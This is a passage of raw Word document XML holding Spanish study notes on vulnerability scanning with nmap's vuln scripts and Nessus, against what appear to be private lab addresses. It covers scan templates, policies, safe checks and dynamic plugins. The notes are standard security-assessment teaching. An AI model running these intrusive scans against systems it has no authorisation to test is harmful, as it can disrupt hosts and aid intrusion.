          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465CBB">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>De esa forma, busca para la 192.168.52.130 y la 192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351060D3" w14:textId="0EF3CDD4" w:rsidR="005715C8" w:rsidRDefault="00BB00C8" w:rsidP="00382356">
      <w:r>
        <w:t>También podemos buscar vulnerabilidades para los puertos UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41555209" w14:textId="0002C77D" w:rsidR="00BB00C8" w:rsidRDefault="00BB00C8" w:rsidP="00BB00C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005715C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v --reason -s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="005715C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -oX vulnerabilidadesnmap.xml --stylesheet="https://svn.nmap.org/nmap/docs/nmap.xsl" 192.168.52.132 --script=vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0420E5DB" w14:textId="40B560B3" w:rsidR="00EE2C3A" w:rsidRPr="00E56D03" w:rsidRDefault="00EE2C3A" w:rsidP="00EE2C3A">
      <w:pPr>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56D03">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w:t>
      </w:r>
      <w:r>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essus</w:t>
      </w:r>
      <w:r w:rsidRPr="00E56D03">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11AD7C90" w14:textId="6775DEEC" w:rsidR="00EE2C3A" w:rsidRDefault="001B1F2A" w:rsidP="00EE2C3A">
      <w:r>
        <w:t>Herramienta para análisis de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF5E8E4" w14:textId="7EBED4AD" w:rsidR="001B1F2A" w:rsidRDefault="001B1F2A" w:rsidP="00EE2C3A">
      <w:r>
        <w:t>Para usarla, iniciamos el servicio con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1E030" w14:textId="51C3FD41" w:rsidR="001B1F2A" w:rsidRDefault="001B1F2A" w:rsidP="00EE2C3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693DF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo /bin/systemctl start nessusd.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32134467" w14:textId="6DAE4618" w:rsidR="00693DF4" w:rsidRPr="00693DF4" w:rsidRDefault="00693DF4" w:rsidP="00EE2C3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693DF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo service nessusd start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A427CD1" w14:textId="7AB4D7AC" w:rsidR="001B1F2A" w:rsidRDefault="001B1F2A" w:rsidP="00EE2C3A">
      <w:r>
        <w:t>Una vez abierto, Nessus tiene una interfaz gráfica web, así que entramos en un navegador y colocamos la dirección y el puerto (puede variar según el S.O.):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2EE5A" w14:textId="41E9568F" w:rsidR="001B1F2A" w:rsidRDefault="00000000" w:rsidP="00EE2C3A">
      <w:hyperlink r:id="rId14" w:anchor="/" w:history="1">
        <w:r w:rsidR="001B1F2A" w:rsidRPr="00F42E2F">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://kali:8834/#/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FAA8EC8" w14:textId="3D345889" w:rsidR="00AF7C95" w:rsidRPr="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C355D5C" w14:textId="66BBFB8A" w:rsidR="00AF7C95" w:rsidRPr="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneos </w:t>
      </w:r>
      <w:r w:rsidR="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">de Hosts </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>en Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433220E0" w14:textId="26121D39" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A">
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host Discovery:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Al igual que Nmap, Nessus también puede escanear los hosts de una red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF35EC1" w14:textId="7974DC6F" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00AF7C95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13397B33" wp14:editId="1F380428">
            <wp:extent cx="1653683" cy="1280271"/>
            <wp:effectExtent l="0" t="0" r="381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53683" cy="1280271"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06991842" w14:textId="32F8419F" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A">
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="084365AB" wp14:editId="33A297EA">
            <wp:extent cx="5400040" cy="304990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049905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3323E9" w14:textId="3D8FC9B1" w:rsidR="001B1F2A" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A">
      <w:r>
        <w:t>También se pueden programar varias cosas como quese ejecute a un determinado tiempo o mande un correo electrónico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407FA4B" w14:textId="0DA82484" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="638A0ECA" w14:textId="088AE929" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00AF7C95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29511F2E" wp14:editId="79824683">
            <wp:extent cx="5400040" cy="2321560"/>
            <wp:effectExtent l="0" t="0" r="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321560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="517159DF" w14:textId="74762320" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="7BDEF4DA" w14:textId="541F919A" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00AF7C95">
      <w:r w:rsidRPr="00AF7C95">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62CD4229" wp14:editId="64C22B3C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>425450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3611748" cy="2217420"/>
            <wp:effectExtent l="0" t="0" r="8255"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611748" cy="2217420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>En la sección DISCOVERY por ejemplo podemos programar que tipo de escaneo queremos hacer, que mensajes de red se van a enviar, etc…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61188E3F" w14:textId="3D566FCD" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00AF7C95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153297B2" w14:textId="5A219444" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="5541CDF1" w14:textId="58867D34" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="3A7E07E3" w14:textId="10015AB2" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="1F01203B" w14:textId="093E2871" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="30A22296" w14:textId="57159C6C" w:rsidR="00AF7C95" w:rsidRDefault="00AF7C95" w:rsidP="00EE2C3A"/>
    <w:p w14:paraId="119C2AF4" w14:textId="3710852B" w:rsidR="00AF7C95" w:rsidRDefault="00634B82" w:rsidP="00634B82">
      <w:r w:rsidRPr="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Escaneo de vulnerabilidades:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00634B82">
        <w:t>Ne</w:t>
      </w:r>
      <w:r>
        <w:t>ssus contiene bastantes herramientas para análisis de vulnerabilidades, a</w:t>
      </w:r>
      <w:r w:rsidR="00693DF4">
        <w:t>lg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unas de ellas de vulnerabilidades muy famosas, como Meltdown, Spectre, WannaCry... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8F762" w14:textId="52B01C35" w:rsidR="00634B82" w:rsidRDefault="00634B82" w:rsidP="00634B82">
      <w:r>
        <w:t>Conforme estas vulnerabilidades son parcheadas en todos los sistemas, las actualizaciones de Nessus van eliminando y añadiendo plantillas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3640A6CF" w14:textId="66BD2343" w:rsidR="00634B82" w:rsidRDefault="00634B82" w:rsidP="00634B82">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo con WannaCry</w:t>
      </w:r>
      <w:r w:rsidRPr="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FEB64F" w14:textId="0C4C834C" w:rsidR="00634B82" w:rsidRDefault="00770630" w:rsidP="00634B82">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770630">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E55A3E4" wp14:editId="622CB268">
            <wp:extent cx="5400040" cy="2908935"/>
            <wp:effectExtent l="0" t="0" r="0"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908935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="333050FA" w14:textId="38E3A2C9" w:rsidR="00634B82" w:rsidRDefault="0064381C" w:rsidP="0064381C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064381C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Por supuesto, en DISCOVERY podemos especificar qué tipo de escáner hacer. Quizás uno más intrusivo donde abarque más puertos. Como detalle, poca gente sabe que los puertos que escanea Nessus por defecto vienen dados por un fichero que se encuentra en </w:t>
      </w:r>
      <w:r w:rsidRPr="0064381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>/opt/nessus/var/nessus/nessus-services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9141D" w14:textId="1E459B04" w:rsidR="0064381C" w:rsidRDefault="0064381C" w:rsidP="0064381C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F58B34E" w14:textId="614EC56C" w:rsidR="0064381C" w:rsidRDefault="0064381C" w:rsidP="0064381C">
      <w:r>
        <w:t>Como vemos, la parte de Plugins esta vez sí contiene los distintos plugins en los que se basa la vulnerabilidad escogida en la plantilla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F89ECC" w14:textId="31E39B30" w:rsidR="0064381C" w:rsidRDefault="0064381C" w:rsidP="0064381C">
      <w:r w:rsidRPr="0064381C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="372A9350" wp14:editId="2821C086">
            <wp:extent cx="5400040" cy="1307465"/>
            <wp:effectExtent l="0" t="0" r="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307465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5575C" w14:textId="44B50C82" w:rsidR="0064381C" w:rsidRDefault="0064381C" w:rsidP="0064381C"/>
    <w:p w14:paraId="70ADB7E2" w14:textId="63A5604D" w:rsidR="0064381C" w:rsidRPr="00DA7388" w:rsidRDefault="00DA7388" w:rsidP="00DA7388">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7388">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>En algunos escaneos, como el escaneo de malware, es necesario darle las credenciales de los hosts para que pueda entrar en el sistema y buscar el malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4C459" w14:textId="69F3CB09" w:rsidR="0064381C" w:rsidRDefault="0064381C" w:rsidP="0064381C"/>
    <w:p w14:paraId="48C10A16" w14:textId="314204FC" w:rsidR="00DA7388" w:rsidRDefault="00DA7388" w:rsidP="0064381C"/>
    <w:p w14:paraId="2DED27B2" w14:textId="455EFAE3" w:rsidR="00DA7388" w:rsidRDefault="00DA7388" w:rsidP="00DA7388">
      <w:r w:rsidRPr="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Escaneo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Avanzado </w:t>
      </w:r>
      <w:r w:rsidRPr="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>de vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidR="00791322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> + Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Por defecto, el escaneo avanzado va a usar todos los Plugins que se encuentren disponibles. Es extremadamente intrusivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CBB373" w14:textId="32128CDF" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00314D04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CB3256D" wp14:editId="4FAF74FA">
            <wp:extent cx="1585097" cy="1005927"/>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85097" cy="1005927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1008E575" w14:textId="4C5D4E75" w:rsidR="00DA7388" w:rsidRDefault="00DA7388" w:rsidP="00DA7388">
      <w:r>
        <w:t>Para usarla mejor, podemos usar Políticas (Polices) Podemos crear una nueva política para el Escaneo avanzado y añadir opciones que se queden por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297BCB1" w14:textId="2085AB9A" w:rsidR="00A86A9F" w:rsidRDefault="00A86A9F" w:rsidP="00DA7388">
      <w:r w:rsidRPr="00A86A9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332A77B3" wp14:editId="248C5D97">
            <wp:extent cx="5400040" cy="1384935"/>
            <wp:effectExtent l="0" t="0" r="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384935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4314FA81" w14:textId="16DAEC40" w:rsidR="00A86A9F" w:rsidRDefault="00A86A9F" w:rsidP="00DA7388"/>
    <w:p w14:paraId="70D117A9" w14:textId="32C638B0" w:rsidR="00A86A9F" w:rsidRDefault="00A86A9F" w:rsidP="00DA7388">
      <w:r>
        <w:t>Dentro de la política, podremos escoger la plantilla en la que basarnos y escoger todos los campos que queramos como si fuera una plantilla más. En el caso de crear con el escáner avanzado es bastante útil escoger qué plugins usar y cuales ignorar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DDC563" w14:textId="792119C4" w:rsidR="00DA7388" w:rsidRDefault="00A86A9F" w:rsidP="00A86A9F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A9F">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>En la pestaña Advance, es importante conocer los Safe Checks. Los safe check previenen que Nessus realice escaneos excesivamente intrusivos que podrían llegar a afectar o romper al objetivo que se esté analizando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E6692C" w14:textId="735D5EED" w:rsidR="00A86A9F" w:rsidRDefault="00A86A9F" w:rsidP="00A86A9F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600F8ECD" w14:textId="5C63F02A" w:rsidR="00A86A9F" w:rsidRPr="00A86A9F" w:rsidRDefault="00A86A9F" w:rsidP="00A86A9F">
      <w:r w:rsidRPr="00A86A9F">
        <w:t>Para usar esta plantilla, igualmente accedemos a crear un nuevo escaneo pero esta vez se encontrará en la pestaña User Defined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A994B7" w14:textId="1927855F" w:rsidR="00A86A9F" w:rsidRDefault="00A86A9F" w:rsidP="00A86A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="042FB4BC" wp14:editId="353545F2">
            <wp:extent cx="2370025" cy="224809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70025" cy="2248095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C344C3B" w14:textId="1D5D2830" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00A86A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DB681F" w14:textId="77777777" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00A86A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49097E98" w14:textId="113626F6" w:rsidR="00791322" w:rsidRDefault="00791322" w:rsidP="00362019">
      <w:r w:rsidRPr="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Escaneo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Avanzado Dinámico </w:t>
      </w:r>
      <w:r w:rsidRPr="00634B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>de vulnerabilidades</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00362019">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00362019" w:rsidRPr="00362019">
        <w:t>El prob</w:t>
      </w:r>
      <w:r w:rsidR="00362019">
        <w:t>lema con la política que vemos en el punto anterior es que como hemos mencionado, los plugins se quedan establecidos. Y como ya sabemos, Nessus se va actualizando constantemente, haciendo que sea necesario un</w:t>
      </w:r>
      <w:r w:rsidR="00314D04">
        <w:t xml:space="preserve"> constante mantenimiento que puede resultar tedioso. Para superar este obstáculo, el escaneo Avanzado Dinámico permite agregar automáticamente plugins a nuestro escaneo en base a una serie de reglas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65815999" w14:textId="537CF4C4" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00314D04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DCDBA9C" wp14:editId="287CB6C9">
            <wp:extent cx="1577477" cy="1044030"/>
            <wp:effectExtent l="0" t="0" r="381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77477" cy="1044030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6E26F" w14:textId="56CB53DD" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:r>
        <w:t>Lo interesante se encuentra en la pestaña Dynamic Plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D3813" w14:textId="53A9FE7D" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:r w:rsidRPr="00314D04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="730CAFA5" wp14:editId="6315BABE">
            <wp:extent cx="5400040" cy="438467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4384675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B94D7BA" w14:textId="4E2C123C" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:r>
        <w:t xml:space="preserve">En este ejemplo se puede seleccionar que en su CPE contenga la palabra ftp y que el Score de peligrosidad sea más de 9. A la derecha se </w:t>
      </w:r>
      <w:r w:rsidR="00F843F9">
        <w:t>debe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seleccionar el S.O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA7F98" w14:textId="7E173EC4" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00314D04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE630A5" wp14:editId="7B04B16B">
            <wp:extent cx="3845560" cy="1233166"/>
            <wp:effectExtent l="0" t="0" r="254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55881" cy="1236476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539C237" w14:textId="0B959D28" w:rsidR="00314D04" w:rsidRDefault="00314D04" w:rsidP="00314D04">
      <w:r w:rsidRPr="00314D04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
